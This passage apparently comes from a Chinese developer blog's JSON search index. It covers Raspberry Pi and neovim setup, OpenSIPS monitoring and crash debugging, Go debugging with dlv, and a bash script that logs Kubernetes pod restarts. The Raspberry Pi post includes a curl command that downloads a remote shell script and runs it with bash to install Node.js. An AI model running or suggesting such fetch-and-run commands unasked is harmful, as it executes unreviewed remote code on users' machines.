\u0026#39;mzlogin/vim-markdown-toc\u0026#39; call plug#end() filetype plugin indent on filetype plugin on filetype indent on set guicursor= set history=1000 let g:netrw_banner=0 let g:ale_linters = { \\ \u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;], \\ \u0026#39;typescript\u0026#39;: [\u0026#39;tsserver\u0026#39;] \\} let g:ale_fixers = {\u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;]} let g:ale_lint_on_save = 1 let g:ale_fix_on_save = 1 let g:ale_typescript_tsserver_executable=\u0026#39;tsserver\u0026#39; let g:airline#extensions#tabline#enabled = 1 let g:ale_set_loclist = 0 let g:ale_set_quickfix = 1 let g:ale_open_list = 0 let g:vim_markdown_folding_disabled = 1 let g:vmt_cycle_list_item_markers = 1 let g:tagbar_sort = 0 \u0026#34; 
colorscheme codedark \u0026#34; let g:airline_theme = \u0026#39;codedark\u0026#39; \u0026#34; \u0026#34; buffer let mapleader = \u0026#34;,\u0026#34; nnoremap \u0026lt;Leader\u0026gt;j :bp\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;k :bn\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;n :bf\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;m :bl\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;l :b#\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;e :e\u0026lt;CR\u0026gt; \u0026#34; open netrw nnoremap \u0026lt;Leader\u0026gt;d :bd\u0026lt;CR\u0026gt; \u0026#34; close buffer nnoremap \u0026lt;Leader\u0026gt;g :!go fmt %\u0026lt;CR\u0026gt; \u0026#34; go fmt current file nnoremap \u0026lt;Leader\u0026gt;tm :%s/\\s\\+$//e\u0026lt;CR\u0026gt; \u0026#34; trim space at endofline nnoremap \u0026lt;Leader\u0026gt;a A nnoremap \u0026lt;Leader\u0026gt;w :w\u0026lt;CR\u0026gt; nnoremap \u0026lt;Leader\u0026gt;c :clo\u0026lt;CR\u0026gt; nnoremap \u0026lt;Leader\u0026gt;/ :Rg\u0026lt;Space\u0026gt; inoremap jj \u0026lt;ESC\u0026gt; highlight CocErrorFloat ctermfg=White let g:netrw_list_hide= \u0026#39;.*\\.swp$\u0026#39; let g:ctrlp_custom_ignore = { \\ \u0026#39;dir\u0026#39;: \u0026#39;\\v[\\/]\\.?(git|hg|svn|node_modules)$\u0026#39;, \\ \u0026#39;file\u0026#39;: \u0026#39;\\v\\.(exe|so|dll|min.js)$\u0026#39;, \\ \u0026#39;link\u0026#39;: \u0026#39;some_bad_symbolic_links\u0026#39;, \\ } set autoread \u0026#34; au CursorHold,CursorHoldI * :e \u0026#34; au FocusGained,BufEnter * :e set so=7 set ruler set cmdheight=2 set hid set backspace=eol,start,indent set whichwrap+=\u0026lt;,\u0026gt;,h,l set ignorecase set smartcase set hlsearch set incsearch set showmatch set mat=2 syntax enable set background=dark set ffs=unix,dos,mac \u0026#34;set ai \u0026#34;Auto indent \u0026#34;set si \u0026#34;Smart indent set wrap \u0026#34;Wrap 
lines set cursorline set tabstop=4 set shiftwidth=4 set expandtab set background=dark \u0026#34; colorscheme solarized \u0026#34; let g:ackprg = \u0026#39;rg --vimgrep --type-not sql --smart-case\u0026#39; map ; : autocmd FileType javascript setlocal ts=2 sts=2 shiftwidth=2 但是没有go-vim写golang还是不太方便的,特别是保存的时候格式化,但是也有方案, 执行vim的Ex命令,:!go fmt % 视频 看视频是非常危险的行为,有可能需要强制关机重启。 ","permalink":"https://wdd.js.org/posts/2021/08/mlg4mt/","summary":"配置 树莓派3B+的配置\n4核1G CPU ARMv7 Processor 64G SD卡 常用软件 neovim LXTerminal终端 chrome浏览器 谷歌拼音输入法 常用语言 golang c nodejs 外设 键盘鼠标: 雷柏 无线机械键盘加鼠标 150块左右 屏幕:一块ipad大小外接屏幕,400块左右 常用工作 Golang UDP Server开发, 总体还算流畅。前提时不要加载太多的neovim插件,特别象coc-vim, go-vim等插件,安装过后让你卡的绝望。每次当我绝望之时,我就关闭了图形界面,回到终端继续干活。但是即使使用纯文本方式登录,运行vim还是很卡。 后来我在macbook pro上也用neovim开发,发现也是很卡。于是我就释然了,9千多的macbook都卡,300多的树莓派卡一点怎么了! 但是卡顿还是非常影响心情的,于是我就大量精简vim的插件。 我基本上就用两个插件,都是和状态栏有关的。其他十二个插件都给注释掉了 call plug#begin(\u0026#39;~/.vim/plugged\u0026#39;) Plug \u0026#39;vim-airline/vim-airline\u0026#39; Plug \u0026#39;vim-airline/vim-airline-themes\u0026#39; Plug \u0026#39;jiangmiao/auto-pairs\u0026#39; \u0026#34;Plug \u0026#39;yonchu/accelerated-smooth-scroll\u0026#39; \u0026#34;Plug \u0026#39;preservim/tagbar\u0026#39;, { \u0026#39;for\u0026#39;: [\u0026#39;go\u0026#39;, \u0026#39;c\u0026#39;]} \u0026#34;Plug \u0026#39;airblade/vim-gitgutter\u0026#39; \u0026#34;Plug \u0026#39;fatih/vim-go\u0026#39;, { \u0026#39;do\u0026#39;: \u0026#39;:GoUpdateBinaries\u0026#39;, \u0026#39;for\u0026#39;: \u0026#39;go\u0026#39; } \u0026#34;Plug \u0026#39;dense-analysis/ale\u0026#39; \u0026#34;Plug \u0026#39;vim-scripts/matchit.zip\u0026#39; \u0026#34;Plug \u0026#39;pangloss/vim-javascript\u0026#39;, {\u0026#39;for\u0026#39;:\u0026#39;javascript\u0026#39;} \u0026#34;Plug \u0026#39;leafgarland/typescript-vim\u0026#39; \u0026#34;Plug \u0026#39;neoclide/coc.nvim\u0026#39;, {\u0026#39;branch\u0026#39;: \u0026#39;release\u0026#39;} \u0026#34;Plug \u0026#39;jremmen/vim-ripgrep\u0026#39; \u0026#34;Plug 
\u0026#39;plasticboy/vim-markdown\u0026#39; \u0026#34;Plug \u0026#39;mzlogin/vim-markdown-toc\u0026#39; call plug#end() filetype plugin indent on filetype plugin on filetype indent on set guicursor= set history=1000 let g:netrw_banner=0 let g:ale_linters = { \\ \u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;], \\ \u0026#39;typescript\u0026#39;: [\u0026#39;tsserver\u0026#39;] \\} let g:ale_fixers = {\u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;]} let g:ale_lint_on_save = 1 let g:ale_fix_on_save = 1 let g:ale_typescript_tsserver_executable=\u0026#39;tsserver\u0026#39; let g:airline#extensions#tabline#enabled = 1 let g:ale_set_loclist = 0 let g:ale_set_quickfix = 1 let g:ale_open_list = 0 let g:vim_markdown_folding_disabled = 1 let g:vmt_cycle_list_item_markers = 1 let g:tagbar_sort = 0 \u0026#34; colorscheme codedark \u0026#34; let g:airline_theme = \u0026#39;codedark\u0026#39; \u0026#34; \u0026#34; buffer let mapleader = \u0026#34;,\u0026#34; nnoremap \u0026lt;Leader\u0026gt;j :bp\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;k :bn\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;n :bf\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;m :bl\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;l :b#\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;e :e\u0026lt;CR\u0026gt; \u0026#34; open netrw nnoremap \u0026lt;Leader\u0026gt;d :bd\u0026lt;CR\u0026gt; \u0026#34; close buffer nnoremap \u0026lt;Leader\u0026gt;g :!","title":"使用树莓派3b+作为辅助开发体验"},{"content":"日志监控 务必监控opensips日志,如果其中出现了CRITICAL关键字, 很可能马上opensips就要崩溃。\n第一要发出告警信息。第二要有主动的自动重启策略,例如使用systemd启动的话,服务崩溃会会立马被重启。或者用docker或者k8s,这些虚拟化技术,可以让容器崩溃后自动重启。\n指标监控 opensips有内部的统计模块,可以很方便的通过opensipsctl或者相关的http的mi接口获取到内部的统计数据。\n以下给出几个关键的统计指标:\n\u0026rsquo;total_size\u0026rsquo;, 全部内存 \u0026lsquo;used_size\u0026rsquo;, 使用的内存 
\u0026lsquo;real_used_size\u0026rsquo;, 真实使用的内存 \u0026lsquo;max_used_size\u0026rsquo;, 最大使用的内存 \u0026lsquo;free_size\u0026rsquo;, 空闲内存 \u0026lsquo;fragments\u0026rsquo;, \u0026lsquo;active_dialogs\u0026rsquo;, 接通状态的通话 \u0026rsquo;early_dialogs\u0026rsquo;, 振铃状态的通话 \u0026lsquo;inuse_transactions\u0026rsquo;, 正在使用的事务 \u0026lsquo;waiting_udp\u0026rsquo;, 堆积的udp消息 \u0026lsquo;waiting_tcp\u0026rsquo; 堆积的tcp消息 当然还有很多其他的指标,可以使用:opensipsctl fifo get_statistics all来获取。\n","permalink":"https://wdd.js.org/opensips/ch3/prd-warning/","summary":"日志监控 务必监控opensips日志,如果其中出现了CRITICAL关键字, 很可能马上opensips就要崩溃。\n第一要发出告警信息。第二要有主动的自动重启策略,例如使用systemd启动的话,服务崩溃后会立马被重启。或者用docker或者k8s,这些虚拟化技术,可以让容器崩溃后自动重启。\n指标监控 opensips有内部的统计模块,可以很方便的通过opensipsctl或者相关的http的mi接口获取到内部的统计数据。\n以下给出几个关键的统计指标:\n\u0026rsquo;total_size\u0026rsquo;, 全部内存 \u0026lsquo;used_size\u0026rsquo;, 使用的内存 \u0026lsquo;real_used_size\u0026rsquo;, 真实使用的内存 \u0026lsquo;max_used_size\u0026rsquo;, 最大使用的内存 \u0026lsquo;free_size\u0026rsquo;, 空闲内存 \u0026lsquo;fragments\u0026rsquo;, \u0026lsquo;active_dialogs\u0026rsquo;, 接通状态的通话 \u0026rsquo;early_dialogs\u0026rsquo;, 振铃状态的通话 \u0026lsquo;inuse_transactions\u0026rsquo;, 正在使用的事务 \u0026lsquo;waiting_udp\u0026rsquo;, 堆积的udp消息 \u0026lsquo;waiting_tcp\u0026rsquo; 堆积的tcp消息 当然还有很多其他的指标,可以使用:opensipsctl fifo get_statistics all来获取。","title":"生产环境监控告警"},{"content":"core dump文件在哪里? 一般情况下,opensips在崩溃的时候,会产生core dump文件。这个文件一般位于根目录下,文件名形如core.xxxx。\ncore dump文件一般大约有1G左右,所以当产生core dump的时候,要确保系统有足够的磁盘空间。\n如何开启core dump? 
第一,opensips脚本中有个参数叫做disable_core_dump, 这个参数默认为no, 也就是启用core dump, 可以将这个参数设置为yes, 来禁用core dump。但是生产环境一般建议还是开启core dump, 否则服务崩溃了,就只能看日志,无法定位到具体的崩溃代码的位置。\ndisable_core_dump=yes 第二,还需要在opensips启动之前,运行:ulimit -c unlimited, 这个命令会让opensips core dump的时候,不会限制core dump文件的大小。一般来说core dump文件的大小是共享内存 + 私有内存。\n第三,opensips进程的用户如果不是root, 那么可能没有权限将core dump文件写到/目录下。有两个解决办法:\n用root用户启动opensips进程 使用-w 参数配置opensips的工作目录,core dump文件将会写到对应的目录中。例如:opensips -w /var/log 如果core dump失败是因为权限的问题, opensips的日志文件中将会打印:\nCan\u0026#39;t open \u0026#39;core.xxxx\u0026#39; at \u0026#39;/\u0026#39;: Permission denied 如何分析core dump文件? 使用gdb\ngdb $(which opensips) core.12333 # 进入gdb调试之后, 输入bt full, 会打印详细的错误栈信息 bt full 没有产生core dump文件,如何分析崩溃原因? 使用objdump。\n一般来说opensips崩溃后,日志文件中一般会出现下面的信息\nkernel: opensips[8954]: segfault at 1ea72b5 ip 00000000004be532 sp 00007ffe9e1e6df0 error 4 in opensips[400000+203000] 我们从中取出几个关键词\nat 1ea72b5 尝试访问的内存地址偏移 error 4 错误的类型, 对照下面的位定义, 4即PF_USER, 表示用户态读取了未映射的内存页 ip 00000000004be532 指令指针的位置, 注意这个4be532 sp 00007ffe9e1e6df0 栈指针的位置 400000+203000 x86架构 /* * Page fault error code bits * bit 0 == 0 means no page found, 1 means protection fault * bit 1 == 0 means read, 1 means write * bit 2 == 0 means kernel, 1 means user-mode * bit 3 == 1 means use of reserved bit detected * bit 4 == 1 means fault was an instruction fetch */ #define PF_PROT (1\u0026lt;\u0026lt;0) #define PF_WRITE (1\u0026lt;\u0026lt;1) #define PF_USER (1\u0026lt;\u0026lt;2) #define PF_RSVD (1\u0026lt;\u0026lt;3) #define PF_INSTR (1\u0026lt;\u0026lt;4) 使用objdump, 可以将二进制文件,反汇编找到对应代码的位置。比如说我们可以在反汇编的输出中搜索4be532,就可以找到对应代码的位置。\nobjdump -j .text -ld -C -S $(which opensips) \u0026gt; op.txt 然后我们在op.txt中搜索4be532, 就能找到对应的源码或者函数的位置。然后根据源码分析问题。\n参考 https://www.opensips.org/Documentation/TroubleShooting-Crash https://stackoverflow.com/questions/2549214/interpreting-segfault-messages https://stackoverflow.com/questions/2179403/how-do-you-read-a-segfault-kernel-log-message/2179464#2179464 
https://rgeissert.blogspot.com/p/segmentation-fault-error.html ","permalink":"https://wdd.js.org/opensips/ch7/crash/","summary":"core dump文件在哪里? 一般情况下,opensips在崩溃的时候,会产生core dump文件。这个文件一般位于根目录下,文件名形如core.xxxx。\ncore dump文件一般大约有1G左右,所以当产生core dump的时候,要确保系统有足够的磁盘空间。\n如何开启core dump? 第一,opensips脚本中有个参数叫做disable_core_dump, 这个参数默认为no, 也就是启用core dump, 可以将这个参数设置为yes, 来禁用core dump。但是生产环境一般建议还是开启core dump, 否则服务崩溃了,就只能看日志,无法定位到具体的崩溃代码的位置。\ndisable_core_dump=yes 第二,还需要在opensips启动之前,运行:ulimit -c unlimited, 这个命令会让opensips core dump的时候,不会限制core dump文件的大小。一般来说core dump文件的大小是共享内存 + 私有内存。\n第三,opensips进程的用户如果不是root, 那么可能没有权限将core dump文件写到/目录下。有两个解决办法:\n用root用户启动opensips进程 使用-w 参数配置opensips的工作目录,core dump文件将会写到对应的目录中。例如:opensips -w /var/log 如果core dump失败是因为权限的问题, opensips的日志文件中将会打印:\nCan\u0026#39;t open \u0026#39;core.xxxx\u0026#39; at \u0026#39;/\u0026#39;: Permission denied 如何分析core dump文件? 使用gdb\ngdb $(which opensips) core.12333 # 进入gdb调试之后, 输入bt full, 会打印详细的错误栈信息 bt full 没有产生core dump文件,如何分析崩溃原因? 使用objdump。\n一般来说opensips崩溃后,日志文件中一般会出现下面的信息\nkernel: opensips[8954]: segfault at 1ea72b5 ip 00000000004be532 sp 00007ffe9e1e6df0 error 4 in opensips[400000+203000] 我们从中取出几个关键词","title":"opensips崩溃分析"},{"content":"排查日志 opensips的log_stderror参数决定写日志的位置,\nyes 写日志到标准错误 no 写日志到syslog服务(默认) 如果使用默认的syslog服务,那么日志将可能写到以下两个文件中。\n/var/log/messages /var/log/syslog 一般情况下,分析/var/log/messages日志,可以定位到无法启动的原因。\n如果日志文件中无法定位到具体原因,那么就可以将log_stderror设置为yes。\n注意:往标准错误中打印的日志,往往比往日志文件中打印的更详细。而且有些时候,我发现这个错误在标准错误中打印了,但是却不会输出到日志文件中。\n所以,看标准错误的日志,往往更容易定位到问题。\n","permalink":"https://wdd.js.org/opensips/ch7/can-not-run/","summary":"排查日志 opensips的log_stderror参数决定写日志的位置,\nyes 写日志到标准错误 no 写日志到syslog服务(默认) 如果使用默认的syslog服务,那么日志将可能写到以下两个文件中。\n/var/log/messages /var/log/syslog 一般情况下,分析/var/log/messages日志,可以定位到无法启动的原因。\n如果日志文件中无法定位到具体原因,那么就可以将log_stderror设置为yes。\n注意:往标准错误中打印的日志,往往比往日志文件中打印的更详细。而且有些时候,我发现这个错误在标准错误中打印了,但是却不会输出到日志文件中。\n所以,看标准错误的日志,往往更容易定位到问题。","title":"opensips无法启动"},{"content":"选择哪个版本的系统? 
不要过高的估算树莓派的性能,最好不要选择那些具有漂亮界面的ubuntu或者manjaro, 因为当你使用这些带桌面的系统时,很大概率界面能让你卡得想把树莓派砸了。\n所以优先选择不带图形界面的lite版本的系统,如果确实需要的话,可以再安装lxde\n网线插了,还是无法联网 插了网线,网口上的绿灯也是在闪烁,但是eth0就是无法联网成功。真是气人。\n解决方案: 编辑 /etc/network/interfaces, 将里面的内容改写成下面的,然后重启树莓派。\n这个配置文件的涵义是:在启动时就使用eth0有线网卡,并且使用dhcp给这个网卡自动配置IP\nauto eth0 iface eth0 inet dhcp iface eth0 inet6 dhcp source-directory /etc/network/interfaces.d 无桌面版本,如何手工安装桌面 首先安装lxde\nsudo apt update sudo apt install lxde -y 然后通过raspi-config, 配置默认从桌面启动\nsudo raspi-config 选择系统配置, 按回车键进入 选择Boot/Auto login, 按回车进入\n选择Desktop, 回车确认。保存之后,退出重启。\n键盘无法输入| | 在linux中是管道的意思,然而我的键盘却无法输入。最终发现是键盘布局的原因。\n在图标上右键,选择配置\n注意这里是US, 这是正常的。如果是UK,就是英式布局,是有问题的,需要把UK的删除,重新增加一个US的。\n如何安装最新版本的neovim? 树莓派使用apt安装的neovim, 版本太老了。很多插件使用上都会体验不好。所以建议安装最新版的neovim。\nsudo apt install snapd sudo snap install --classic nvim 注意: nvim的默认安装的路径是/snap/bin, 所以你需要把这个路径设置到PATH里,才能使用nvim. 如何安装最新的golang? 打开这个页面 https://golang.google.cn/dl/\n因为树莓派是armhf架构的,所以在这么多版本里,只有armv6l这个版本是能够在树莓派上运行的。\n压缩包下载之后解压,里面的go/bin目录中就有go的可执行文件,只要将这个目录暴露到PATH中,就能使用golang了。\n如何安装最新版本的node.js curl -L https://gitee.com/wangduanduan/install-node/raw/master/bin/n -o n bash n lts 如何安装谷歌浏览器? sudo apt full-upgrade sudo apt install chromium-browser -y 使用清华apt源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/ # 编辑 `/etc/apt/sources.list` 文件,删除原文件所有内容,用以下内容取代: deb http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi deb-src http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi # 编辑 `/etc/apt/sources.list.d/raspi.list` 文件,删除原文件所有内容,用以下内容取代: deb http://mirrors.tuna.tsinghua.edu.cn/raspberrypi/ buster main ui 如何安装截图工具? sudo apt-get install -y flameshot 使用树莓派在浏览器上看视频怎么样? 非常卡\n","permalink":"https://wdd.js.org/posts/2021/08/uuvor0/","summary":"选择哪个版本的系统? 
不要过高的估算树莓派的性能,最好不要选择那些具有漂亮界面的ubuntu或者manjaro, 因为当你使用这些带桌面的系统时,很大概率界面能让你卡得想把树莓派砸了。\n所以优先选择不带图形界面的lite版本的系统,如果确实需要的话,可以再安装lxde\n网线插了,还是无法联网 插了网线,网口上的绿灯也是在闪烁,但是eth0就是无法联网成功。真是气人。\n解决方案: 编辑 /etc/network/interfaces, 将里面的内容改写成下面的,然后重启树莓派。\n这个配置文件的涵义是:在启动时就使用eth0有线网卡,并且使用dhcp给这个网卡自动配置IP\nauto eth0 iface eth0 inet dhcp iface eth0 inet6 dhcp source-directory /etc/network/interfaces.d 无桌面版本,如何手工安装桌面 首先安装lxde\nsudo apt update sudo apt install lxde -y 然后通过raspi-config, 配置默认从桌面启动\nsudo raspi-config 选择系统配置, 按回车键进入 选择Boot/Auto login, 按回车进入\n选择Desktop, 回车确认。保存之后,退出重启。\n键盘无法输入| | 在linux中是管道的意思,然而我的键盘却无法输入。最终发现是键盘布局的原因。\n在图标上右键,选择配置\n注意这里是US, 这是正常的。如果是UK,就是英式布局,是有问题的,需要把UK的删除,重新增加一个US的。\n如何安装最新版本的neovim? 树莓派使用apt安装的neovim, 版本太老了。很多插件使用上都会体验不好。所以建议安装最新版的neovim。\nsudo apt install snapd sudo snap install --classic nvim 注意: nvim的默认安装的路径是/snap/bin, 所以你需要把这个路径设置到PATH里,才能使用nvim. 如何安装最新的golang? 打开这个页面 https://golang.google.cn/dl/\n因为树莓派是armhf架构的,所以在这么多版本里,只有armv6l这个版本是能够在树莓派上运行的。\n压缩包下载之后解压,里面的go/bin目录中就有go的可执行文件,只要将这个目录暴露到PATH中,就能使用golang了。","title":"树莓派3b+踩坑记录"},{"content":"关于js sdk的设计,这篇文档基本上详细介绍了很多的点,值得深入阅读一遍。https://github.com/hueitan/javascript-sdk-design\n然而最近在重构某个js sdk时,也发现了一些问题,这个问题并未在上述文章中提及。\njs sdk在收到服务端的响应时,直接将server端返回的错误码给到用户。\n这里会有一个问题,这个响应码,实际上是js sdk和server之间的消息交流。并不是js sdk和用户之间的消息交流。\n如果我们将server端的响应直接返回给用户,则js sdk可以理解为是一个透明代理。用户将会和server端产生强耦合。如果server端有不兼容的变化,将会直接影响到用户的使用。\n所以较好的做法是js sdk将这个错误封装为另一种表现形式,和server端分离出来。\n","permalink":"https://wdd.js.org/posts/2021/08/kbcih7/","summary":"关于js sdk的设计,这篇文档基本上详细介绍了很多的点,值得深入阅读一遍。https://github.com/hueitan/javascript-sdk-design\n然而最近在重构某个js sdk时,也发现了一些问题,这个问题并未在上述文章中提及。\njs sdk在收到服务端的响应时,直接将server端返回的错误码给到用户。\n这里会有一个问题,这个响应码,实际上是js sdk和server之间的消息交流。并不是js sdk和用户之间的消息交流。\n如果我们将server端的响应直接返回给用户,则js sdk可以理解为是一个透明代理。用户将会和server端产生强耦合。如果server端有不兼容的变化,将会直接影响到用户的使用。\n所以较好的做法是js sdk将这个错误封装为另一种表现形式,和server端分离出来。","title":"js sdk 跨层穿透问题"},{"content":"本来打算用gdb调试的,看了官方的文档https://golang.org/doc/gdb, 官方更推荐使用delve这个工具调试。\n我的电脑是linux, 
所以就用如下的命令安装。\ngo install github.com/go-delve/delve/cmd/dlv@latest\n我要调试的并不是普通的代码,而是测试代码。\n当执行测试的时候报错的位置是xxx/demo/demo_test.go, 200行\ndlv test moduleName/demo \u0026gt; b demo_test.go:200 # 在文件的对应行设置断点 \u0026gt; bp # print all breakpoint \u0026gt; c # continue to exe \u0026gt; p variableName ","permalink":"https://wdd.js.org/golang/debug-with-dlv/","summary":"本来打算用gdb调试的,看了官方的文档https://golang.org/doc/gdb, 官方更推荐使用delve这个工具调试。\n我的电脑是linux, 所以就用如下的命令安装。\ngo install github.com/go-delve/delve/cmd/dlv@latest\n我要调试的并不是普通的代码,而是测试代码。\n当执行测试的时候报错的位置是xxx/demo/demo_test.go, 200行\ndlv test moduleName/demo \u0026gt; b demo_test.go:200 # 在文件的对应行设置断点 \u0026gt; bp # print all breakpoint \u0026gt; c # continue to exe \u0026gt; p variableName ","title":"Debug With Dlv"},{"content":"程序可能大部分时间都是按照正常的逻辑运行,然而也有少数的概率,程序发生异常。\n优秀的程序,不仅仅要考虑正常运行,还需要考虑两点:\n如何处理异常 如何在发生异常后,快速定位原因 正常的处理如果称为收益的话,异常的处理就是要能够及时止损。\n能稳定运行364天的程序,很可能因为一天的问题,就被客户抛弃。因为这一天的损失,就可能会超过之前收益的总和。\n异常应当如何处理 如果事情有变坏的可能,不管这种可能性有多小,它总会发生。《墨菲定律》\n对于程序来说,避免变坏的方法只有一个,就是不要运行程序(纯粹废话😂)。\n1. 及时崩溃 var conn = nil var maxConnectTimes = 3 var reconnectDelay = 3 * 1000 var currentReconnectTimes = 0 var timeId = 0 func InitDb () { conn = connect(\u0026#34;数据库\u0026#34;) conn.on(\u0026#34;connected\u0026#34;, ()=\u0026gt;{ // 将当前重连次数重置为0 currentReconnectTimes = 0 }) conn.on(\u0026#34;error\u0026#34;, ReconnectDb) } func ReconnectDb () { conn.Close() // 如果重连次数大于最大重连次数,将不再重连 if currentReconnectTimes \u0026gt; maxConnectTimes { return } // 如果已经存在重连的任务,则先关闭 if timeId != 0 { cleanTimeout(timeId) } // 当前重连次数增加 currentReconnectTimes++ // 开始延迟重连 timeId = setTimeout(InitDb, reconnectDelay) } 2. 如何快速定位问题 第一,代码的敬畏之心 第二,及时告警。日志,或者http请求 第三,编程时,就要考虑异常。例如程序依赖 MQ或者Mysql,当与之交互的连接断开后,应该怎样处理? 
第四,多实例问题考虑 第五,检查清单\n","permalink":"https://wdd.js.org/posts/2021/08/brh6mu/","summary":"程序可能大部分时间都是按照正常的逻辑运行,然而也有少数的概率,程序发生异常。\n优秀的程序,不仅仅要考虑正常运行,还需要考虑两点:\n如何处理异常 如何在发生异常后,快速定位原因 正常的处理如果称为收益的话,异常的处理就是要能够及时止损。\n能稳定运行364天的程序,很可能因为一天的问题,就被客户抛弃。因为这一天的损失,就可能会超过之前收益的总和。\n异常应当如何处理 如果事情有变坏的可能,不管这种可能性有多小,它总会发生。《墨菲定律》\n对于程序来说,避免变坏的方法只有一个,就是不要运行程序(纯粹废话😂)。\n1. 及时崩溃 var conn = nil var maxConnectTimes = 3 var reconnectDelay = 3 * 1000 var currentReconnectTimes = 0 var timeId = 0 func InitDb () { conn = connect(\u0026#34;数据库\u0026#34;) conn.on(\u0026#34;connected\u0026#34;, ()=\u0026gt;{ // 将当前重连次数重置为0 currentReconnectTimes = 0 }) conn.on(\u0026#34;error\u0026#34;, ReconnectDb) } func ReconnectDb () { conn.Close() // 如果重连次数大于最大重连次数,将不再重连 if currentReconnectTimes \u0026gt; maxConnectTimes { return } // 如果已经存在重连的任务,则先关闭 if timeId != 0 { cleanTimeout(timeId) } // 当前重连次数增加 currentReconnectTimes++ // 开始延迟重连 timeId = setTimeout(InitDb, reconnectDelay) } 2.","title":"面向异常编程todo"},{"content":"一般来说,监控pod的重启状态并告警,可以使用普罗米修斯或者kubewatch。\n但是如果你只想在某个pod重启时,往某个日志文件中写一条记录,那么下面的方式将是非常简单的。\n实现的思路是使用kubectl 获取所有pod的状态信息,统计发生过重启的pod, 然后和之前的重启次数做对比,如果比之前记录的次数大,那么肯定是发生过重启了。\n#!/bin/bash now=$(date \u0026#34;+%Y-%m-%d %H:%M:%S\u0026#34;) log_file=\u0026#34;/var/log/pod.restart.log\u0026#34; ns=\u0026#34;some-namespace\u0026#34; echo $now start pod restart monitor \u0026gt;\u0026gt; $log_file # touch一下之前的记录文件,防止文件不存在 touch restart.old.log # 生成本次的统计数据 kubectl get pod -n $ns -o wide | awk \u0026#39;$4 \u0026gt; 0{print $1,$4}\u0026#39; | grep -v NAME \u0026gt; restart.now.log # 按行读取本次统计数据 # 数据格式为:podname 重启次数 while read line do # pod name name=$(echo $line | awk \u0026#39;{print $1}\u0026#39;) # 重启次数 count=$(echo $line | awk \u0026#39;{print $2}\u0026#39;) # 检查本次重启的pod名称是否在之前的记录中存在 if grep $name restart.old.log; then # 如果存在,则取出之前记录的重启次数 t=$(grep $name restart.old.log | awk \u0026#39;{print $2}\u0026#39;) # 和本次记录的重启次数比较,如果本次的重启次数较大 # 则说明pod一定重启过 if [ $count -gt $t ]; then echo $now ERROR pod_restart $name 
\u0026gt;\u0026gt; $log_file fi else # 如果重启的pod不存在之前的记录中,也说明pod重启过 echo $now ERROR pod_restart $name \u0026gt;\u0026gt; $log_file fi done \u0026lt; restart.now.log # 删除老的记录文件 rm -f restart.old.log # 将新的记录文件重命名为老的记录文件 mv restart.now.log restart.old.log 然后可以将上面的脚本做成定时任务,每分钟执行一次。那么就可以将pod重启的信息写入文件。\n然后配合一些日志监控的程序,就可以监控日志文件。然后提取关键词,最后发送告警信息。\n其实我们也可以在写告警日志文件的同时,通过curl发送http请求,来发送告警通知。\n在公有云上,可以使用钉钉的通知webhook, 也是非常方便的。\n","permalink":"https://wdd.js.org/posts/2021/07/giqfii/","summary":"一般来说,监控pod的重启状态并告警,可以使用普罗米修斯或者kubewatch。\n但是如果你只想在某个pod重启时,往某个日志文件中写一条记录,那么下面的方式将是非常简单的。\n实现的思路是使用kubectl 获取所有pod的状态信息,统计发生过重启的pod, 然后和之前的重启次数做对比,如果比之前记录的次数大,那么肯定是发生过重启了。\n#!/bin/bash now=$(date \u0026#34;+%Y-%m-%d %H:%M:%S\u0026#34;) log_file=\u0026#34;/var/log/pod.restart.log\u0026#34; ns=\u0026#34;some-namespace\u0026#34; echo $now start pod restart monitor \u0026gt;\u0026gt; $log_file # touch一下之前的记录文件,防止文件不存在 touch restart.old.log # 生成本次的统计数据 kubectl get pod -n $ns -o wide | awk \u0026#39;$4 \u0026gt; 0{print $1,$4}\u0026#39; | grep -v NAME \u0026gt; restart.now.log # 按行读取本次统计数据 # 数据格式为:podname 重启次数 while read line do # pod name name=$(echo $line | awk \u0026#39;{print $1}\u0026#39;) # 重启次数 count=$(echo $line | awk \u0026#39;{print $2}\u0026#39;) # 检查本次重启的pod名称是否在之前的记录中存在 if grep $name restart.","title":"监控pod重启并写日志文件"},{"content":"本来我的目的是使用cluster模块fork出多个进程,让各个进程都能处理udp消息。但是最终测试发现,实际上仅有一个进程处理了绝大多数消息,其他的进程,要么不处理消息,要么只处理非常少的消息。\n然而使用cluster来开启http服务的多进程,却能够达到多进程的负载。\nserver端demo代码: const cluster = require(\u0026#39;cluster\u0026#39;) const numCPUs = require(\u0026#39;os\u0026#39;).cpus().length const { logger } = require(\u0026#39;./logger\u0026#39;) const dgram = require(\u0026#39;dgram\u0026#39;) // const { createHTTPServer, createUDPServer } = require(\u0026#39;./app\u0026#39;) const port = 8088 if (cluster.isMaster) { for (let i = 0; i \u0026lt; numCPUs; i++) { cluster.fork() } cluster.on(\u0026#39;exit\u0026#39;, (worker, code, signal) =\u0026gt; { logger.info(`工作进程 
